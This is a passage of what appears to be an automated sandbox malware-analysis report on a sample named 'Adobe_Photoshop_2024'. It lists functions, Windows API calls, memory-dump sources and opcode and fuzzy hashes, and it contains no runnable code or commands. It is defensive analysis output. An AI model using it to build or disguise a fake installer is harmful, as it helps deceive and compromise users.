                        • Opcode Fuzzy Hash: 865779cfaf58b9b3a87a5347af50efe3c4e270122e6ed630bfe303d32dd2b554
                        • Instruction Fuzzy Hash: 3E4106B1909381CFC716CB28D894599BFF1EF46600F1985DBD4859B263E3399C49CB62
                        Function 054DD133 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 054DD386
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105592954.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_54d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 3bfc1722d5860d38e38038988ea78e1bd0af4e1ebc157b66d005e50bac35aa42
                        • Instruction ID: 8db3d0688842d7d9b9e8ec8bd9f5b94ac82caf1537d42cb5dd1ffbf63c7d1c3d
                        • Opcode Fuzzy Hash: 3bfc1722d5860d38e38038988ea78e1bd0af4e1ebc157b66d005e50bac35aa42
                        • Instruction Fuzzy Hash: 5C710270A00B058FD728DF69D5547AABBF6FF88300F008A6AD48AD7B50D775E945CBA0
                        Function 05FE74B0 Relevance: 1.7, APIs: 1, Instructions: 157threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 05FE7570
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 89f76628260baf31c3f4d524109c7b907cc87bc716581f494bf6b11cdf31c15e
                        • Instruction ID: 54d0f30a9388faa82b80d710b0457555c598fcdad758fd3fb230be44ace945d3
                        • Opcode Fuzzy Hash: 89f76628260baf31c3f4d524109c7b907cc87bc716581f494bf6b11cdf31c15e
                        • Instruction Fuzzy Hash: 1D616C74E05289DFDB14EF99D494BADBBB1FF48304F10846AE401AB391DB799885CF90
                        Function 00E76216 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00E762D1
                        Memory Dump Source
                        • Source File: 00000006.00000002.2101250897.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e70000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: f77a4be6e037bd63a12d5c2d720a06293605d9554b38734b9e92be8a6da15056
                        • Instruction ID: aec7c1672d6fab45e88d2096cd0af05cea31449601bca7f971ba6540c8ea2e57
                        • Opcode Fuzzy Hash: f77a4be6e037bd63a12d5c2d720a06293605d9554b38734b9e92be8a6da15056
                        • Instruction Fuzzy Hash: 7441E2B0C00619DFDB24CFA9C848BDDBBF5BF49308F24816AD408AB255D7B55946CF50
                        Function 00E74940 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00E762D1
                        Memory Dump Source
                        • Source File: 00000006.00000002.2101250897.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e70000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 45cfcd9661e20d9f143de8ffa01cb4c4382c922a9a0fd1ce61505701c3d590d5
                        • Instruction ID: d4b42bc2c24b1a214d09272e739720bf263506d939d3efd563c2759ff0c9ec76
                        • Opcode Fuzzy Hash: 45cfcd9661e20d9f143de8ffa01cb4c4382c922a9a0fd1ce61505701c3d590d5
                        • Instruction Fuzzy Hash: 2441E3B0C00719CBDB24DFA9C848B9DBBF5BF49308F20806AD408BB255D7B56946CF90
                        Function 05FEA630 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 05FEA6C2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 021815e8dd2f9f78aeeee9fac2311526f88f2f11f8abd7345306b6e9488f7ab2
                        • Instruction ID: 66ad15c35e3dc9a1f06a229f9f1df38c2be6d542830f351f33f6ad27325cf736
                        • Opcode Fuzzy Hash: 021815e8dd2f9f78aeeee9fac2311526f88f2f11f8abd7345306b6e9488f7ab2
                        • Instruction Fuzzy Hash: A93156B59042498FCB00DFA9D884ADEFFF0FB49310F14856AD418AB312C378A985CFA1
                        Function 0575C5F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0575C68F
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: ee046e538a2a399e7af971331ee33c9c3855be4b6d56ff3985cc139b8ddbb1e8
                        • Instruction ID: 712d6ddec1255cfc2a13269463c3c70a5df45acb5b83a76c20c65c0308ae253f
                        • Opcode Fuzzy Hash: ee046e538a2a399e7af971331ee33c9c3855be4b6d56ff3985cc139b8ddbb1e8
                        • Instruction Fuzzy Hash: 4431C0B5D003099FDB10DF9AD884A9EBBF9FB58320F14842AE919A7210D775A944CFA0
                        Function 0575C5F8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0575C68F
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: 8154a5d4a67ad3ab0ebf3a53dcd0e6d1420c679763622b4a0dd27dcbbd7f22e7
                        • Instruction ID: c602057eeecbcbb51ef0340b8b205523ddd719c8063a8cfce07679a37ec582bb
                        • Opcode Fuzzy Hash: 8154a5d4a67ad3ab0ebf3a53dcd0e6d1420c679763622b4a0dd27dcbbd7f22e7
                        • Instruction Fuzzy Hash: 0021C0B5D003099FDB10CF9AD884A9EFBF9FB58320F14842AE919A7210D775A944CFA0
                        Function 05FEA728 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                        Download Yara Rule
                        APIs
                        • EnumThreadWindows.USER32(?,00000000,?), ref: 05FEA7A1
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: EnumThreadWindows
                        • String ID:
                        • API String ID: 2941952884-0
                        • Opcode ID: c2e88745ddaf009f258c7a86363924cad22f763d97aee0b9ca39c32c5421c86c
                        • Instruction ID: a08d44b24f44bda52b0ab3a832f5dfe1400a6076309038a178c2fde717c650ca
                        • Opcode Fuzzy Hash: c2e88745ddaf009f258c7a86363924cad22f763d97aee0b9ca39c32c5421c86c
                        • Instruction Fuzzy Hash: 74214CB5D002099FDB14CF9AD884BEEFBF5FB48320F10842AD458A3250D778A941CFA1
                        Function 054DF608 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 054DF68F
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105592954.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_54d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 3e5456e22908a4fe98947d2de2b3fa9f0b35012d1462e45563c2b8011546e647
                        • Instruction ID: 817e879f21e55c41706ed6da55b40dcf9fb8616fc90ce062c2ed29821c3aab57
                        • Opcode Fuzzy Hash: 3e5456e22908a4fe98947d2de2b3fa9f0b35012d1462e45563c2b8011546e647
                        • Instruction Fuzzy Hash: 6721E4B5900208AFDB10CF9AD984ADEFFF9FB48310F14841AE918A3310D379A954CFA4
                        Function 05FEA730 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                        Download Yara Rule
                        APIs
                        • EnumThreadWindows.USER32(?,00000000,?), ref: 05FEA7A1
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: EnumThreadWindows
                        • String ID:
                        • API String ID: 2941952884-0
                        • Opcode ID: bd6255e24423e2e648f3f1446129428cbd08425784a76545dd6cffdd0c42372f
                        • Instruction ID: b3dc8f71cc3590d293517f55c1a88300a4643d92ca15d37009a163ac3139abf8
                        • Opcode Fuzzy Hash: bd6255e24423e2e648f3f1446129428cbd08425784a76545dd6cffdd0c42372f
                        • Instruction Fuzzy Hash: 632138B5D002098FDB14DF9AC844BEEFBF5FB88310F14842AD458A3250D778A945CFA1
                        Function 05751968 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardLayout.USER32(00000000), ref: 057519DE
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: KeyboardLayout
                        • String ID:
                        • API String ID: 194098044-0
                        • Opcode ID: 2716ed28ddeb3ddfe236d1336f8d7210f5eecfc0acce3fefe06aa7509c9c98b0
                        • Instruction ID: af7b968020ee07ac6675050b14bafcef8c5a94093737604daea7fafa8e326e26
                        • Opcode Fuzzy Hash: 2716ed28ddeb3ddfe236d1336f8d7210f5eecfc0acce3fefe06aa7509c9c98b0
                        • Instruction Fuzzy Hash: 8E1134B5D003498FDB10DFA9D5897DEBBF4EB08220F54896AC959A7240C379A584CFA0
                        Function 054DD320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 054DD386
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105592954.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_54d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 471c849922000dadefd8c4a0b6d2928f0d2c79d3973f9b55f76996f6ec648b9a
                        • Instruction ID: 5ce2a147bff7a770d149176214cd24356228840bee4d414770487b13a547d2fc
                        • Opcode Fuzzy Hash: 471c849922000dadefd8c4a0b6d2928f0d2c79d3973f9b55f76996f6ec648b9a
                        • Instruction Fuzzy Hash: 7C11DFB5C007498FCB10DF9AD844ADEFBF5AB89210F10846AD819A7610C379A545CFA1
                        Function 057512A8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                        Download Yara Rule
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 05751ACD
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 4caf0efcd6f15cc38b595abb4d44f5f485d13f2034e91d467599ccd3de5b8fd9
                        • Instruction ID: e7eb3c3abe08606c166cdc48a1bea1ed215dee1ba809167f097972a634cb9d3b
                        • Opcode Fuzzy Hash: 4caf0efcd6f15cc38b595abb4d44f5f485d13f2034e91d467599ccd3de5b8fd9
                        • Instruction Fuzzy Hash: 691115B18047488FCB20DF9AD444B9EFBF4EB48320F10845AD559A7300C379A944CFA5
                        Function 05751978 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardLayout.USER32(00000000), ref: 057519DE
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: KeyboardLayout
                        • String ID:
                        • API String ID: 194098044-0
                        • Opcode ID: ad54ddd7f990599c84b9204bd1c0e1e58a23f08372a6340931989374475edfc9
                        • Instruction ID: 002c1f31e2ef9b13dbae666302edd03894fc61f1fbbb978f01cc483a368fe0a5
                        • Opcode Fuzzy Hash: ad54ddd7f990599c84b9204bd1c0e1e58a23f08372a6340931989374475edfc9
                        • Instruction Fuzzy Hash: 0E1113B09003498FDB10EFA9D4497EEBBF4EB09220F10885AD559A7240C7796584CBA0
                        Function 05751A70 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                        Download Yara Rule
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 05751ACD
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 1091f4ea1bbf0cfb9298caf0859076b66e69777578956f3c8be6cf6cba79028d
                        • Instruction ID: 155ae047f614081f2256b4197d1808da233eb02970b17ef21826ee1c078186dd
                        • Opcode Fuzzy Hash: 1091f4ea1bbf0cfb9298caf0859076b66e69777578956f3c8be6cf6cba79028d
                        • Instruction Fuzzy Hash: CB1103B18003489FDB10DF9AD484BDEFBF8EB48324F148459D558A3300C379A944CFA5
                        Function 05FE2B08 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05FE2B4A
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: d6e8fb2f6036809f54884690cb5ed0459e456220356404c4ff7afc73695cff8d
                        • Instruction ID: d71bea5eedb11a0157c5081988c2996b7784e370505bbe56dfa1219cbd0bc9ea
                        • Opcode Fuzzy Hash: d6e8fb2f6036809f54884690cb5ed0459e456220356404c4ff7afc73695cff8d
                        • Instruction Fuzzy Hash: C9E0DF323402489B8314763E68655AE3BAADAC611879840B9F50ACB349DE2A9D06CB92
                        Function 05FE3BD0 Relevance: 1.5, APIs: 1, Instructions: 23libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9f81156d427fe9448c886508a34eec1e2f434981f49eb22785f677dfad35677d
                        • Instruction ID: 2233906798304dc2c07bdf3f5c8267c2ee8e6b137cb1c3ba280b48c5fb184574
                        • Opcode Fuzzy Hash: 9f81156d427fe9448c886508a34eec1e2f434981f49eb22785f677dfad35677d
                        • Instruction Fuzzy Hash: E8E0C2366043408FFF167A34C40A7693BA7EB85106F268871C442DF281FE78E9C1EB20
                        Function 05FE2B18 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05FE2B4A
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 158da9fe2890978e1bb17948d0a641baaa9f70b5497d975a6b06e909cd7a46f7
                        • Instruction ID: e3b795d1c2206d51b9c46c420b6ec06e76b2b0e0d52c148666b3a2b0779d43ac
                        • Opcode Fuzzy Hash: 158da9fe2890978e1bb17948d0a641baaa9f70b5497d975a6b06e909cd7a46f7
                        • Instruction Fuzzy Hash: A4D0C2313002099B4714A67E645553F369BDBC502475440BCE50ECB348DE2A9C028792
                        Function 0575F314 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0575FCF9,?,?), ref: 0575FEA0
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: ef443aacfb7f6d47c7e5a5148429710bf4d811514ef2a5748c597ede4f045241
                        • Instruction ID: 4d9013628977a8204c4e3d2a33bf7479cd79d9c96071abfd52708ba941c05bda
                        • Opcode Fuzzy Hash: ef443aacfb7f6d47c7e5a5148429710bf4d811514ef2a5748c597ede4f045241
                        • Instruction Fuzzy Hash: 011125B18006498FCB20DF9AC548BEEBBF4EB48320F10846AD958A7341D779A944CFA5
                        Function 0575FE43 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0575FCF9,?,?), ref: 0575FEA0
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: ffa1bca6818c152793cfe0104d2fc22553e809a1c01d790523de3ecbb0c5619d
                        • Instruction ID: 6c6a78ce87bea4adf02c789546925aea64be55afe36d9d2941881f11c52d90d6
                        • Opcode Fuzzy Hash: ffa1bca6818c152793cfe0104d2fc22553e809a1c01d790523de3ecbb0c5619d
                        • Instruction Fuzzy Hash: 131136B18002498FCB10DF9AC585BDEBBF4EB58320F14842AD958A7341C779A544CFA5
                        Function 00E1D1B8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100745838.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e1d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fecc922e14465bbc644669978259df92683b0d7ea64964906c5875ed0e93022
                        • Instruction ID: a779e4e6d791f0c4da60e1e722f22b64f7fe83e76826e32981fe46db6ea1d199
                        • Opcode Fuzzy Hash: 8fecc922e14465bbc644669978259df92683b0d7ea64964906c5875ed0e93022
                        • Instruction Fuzzy Hash: F62145B1108200DFCB05CF14CDC0FA6BFA5FB98324F208569EC091B266C33AD896CBA1
                        Function 00E2D640 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100879589.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e2d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a05959a917fc621900589d3e25e6bda50aaecf01f8d98d929e7b47e246cbda88
                        • Instruction ID: 341e443d97456dc9ad21bf6db94e7ab43120f3cdc657e8bb047619a50ef35fa1
                        • Opcode Fuzzy Hash: a05959a917fc621900589d3e25e6bda50aaecf01f8d98d929e7b47e246cbda88
                        • Instruction Fuzzy Hash: 87210475508204DFCB04DF14E9C4F26BF65FB88318F24C56DDA0E5B296C37AD846DA61
                        Function 00E2D488 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100879589.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e2d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a2b82a41230009c6d9cb3553fd8fa17285cb933d774800dadf61d083aca3586
                        • Instruction ID: 05541b02b30d796341bdbf83ce86eb85f95b0da0ffb7b36a31ac89cb2ef23bb9
                        • Opcode Fuzzy Hash: 2a2b82a41230009c6d9cb3553fd8fa17285cb933d774800dadf61d083aca3586
                        • Instruction Fuzzy Hash: 3B213471548204DFCB05DF14E9C0B26BBA5FB98318F20C5ADEA095B396C3BAD806CB61
                        Function 00E1D1B3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100745838.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e1d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction ID: e9ef0e5a0813f4d3b409c82e886cd99569cfd7631643524f898a30fe06620523
                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction Fuzzy Hash: 1311D376508240CFDB16CF50D9C4B56BF71FB98324F24C6A9DD094B266C336D89ACBA2
                        Function 00E2D63B Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100879589.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e2d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction ID: 1d06e519e7ab80aeddd9123029b834115001ea13f60672d218eff33f88681b14
                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction Fuzzy Hash: F311D075508240CFCB05CF10D9C4B15BF71FB84318F24C6AAD9494B256C33AD81ACB61
                        Function 00E2D483 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2100879589.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_e2d000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction ID: f9db4b2c3108631eb1bc951bbe2425e4b49af4ee62ca53514ac9f302f7587df3
                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction Fuzzy Hash: E011DD75548280CFCB02CF14E9C4B15BFB1FB84318F24C6AAD9494B296C37AD80ACB62

                        Non-executed Functions

                        Function 0575B968 Relevance: 26.9, Strings: 21, Instructions: 623COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$Haq$Haq$Haq$Haq$Haq
                        • API String ID: 0-2054831069
                        • Opcode ID: a7392b2971c12af800ad17f2669162a9b019830990ad997dc1c7d7c804b89799
                        • Instruction ID: 649362a57bc6a044b8661279f124fb42e026937265c9b33bc60073ec8a5efaa0
                        • Opcode Fuzzy Hash: a7392b2971c12af800ad17f2669162a9b019830990ad997dc1c7d7c804b89799
                        • Instruction Fuzzy Hash: DF328070A002188FDB64DF79C8547AEBBF2BF84310F1485A9D809AB395DF749E85CB91
                        Function 0561A68F Relevance: 2.0, Instructions: 2008COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105831804.0000000005612000.00000002.00000001.01000000.0000000A.sdmp, Offset: 05610000, based on PE: true
                        • Associated: 00000006.00000002.2105811390.0000000005610000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 00000006.00000002.2105973413.000000000565A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5610000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eda7b7d42aa6c38a0c78b8fa676760681f3bc83fd8237ba5d472e0df6d443a4e
                        • Instruction ID: 25a1ce7ecf41ad994e9d1ef7791873b93b2a3d31dfb6601b63f222eb05f50942
                        • Opcode Fuzzy Hash: eda7b7d42aa6c38a0c78b8fa676760681f3bc83fd8237ba5d472e0df6d443a4e
                        • Instruction Fuzzy Hash: 43E2E6EBC4A5C19FE7076B28B8E65D47F71FE7A20CB5E06C1D5802A017F12867A78748
                        Function 0740756C Relevance: .7, Instructions: 708COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, Offset: 07400000, based on PE: true
                        • Associated: 00000006.00000002.2107827329.0000000007400000.00000002.00000001.01000000.00000011.sdmpDownload File
                        • Associated: 00000006.00000002.2108106591.0000000007462000.00000002.00000001.01000000.00000011.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_7400000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10f474279e25fd5de0f8d6ef7452747c6754575527c623251b0c5fee1da18d6c
                        • Instruction ID: 4f343e0824165959bd75bb32253fe01c63c643a98ceb899d873c5e13c86d9ad4
                        • Opcode Fuzzy Hash: 10f474279e25fd5de0f8d6ef7452747c6754575527c623251b0c5fee1da18d6c
                        • Instruction Fuzzy Hash: 79423AA540E3C28FCB034F7889B55D1BFB1AE5721471E09DBC0C08F1A3E169669AD763
                        Function 074063C1 Relevance: .7, Instructions: 702COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, Offset: 07400000, based on PE: true
                        • Associated: 00000006.00000002.2107827329.0000000007400000.00000002.00000001.01000000.00000011.sdmpDownload File
                        • Associated: 00000006.00000002.2108106591.0000000007462000.00000002.00000001.01000000.00000011.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_7400000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8e1c62d6eb927dca8422e4bdc34fc78e0f3d4760726e27adff549d45dd372538
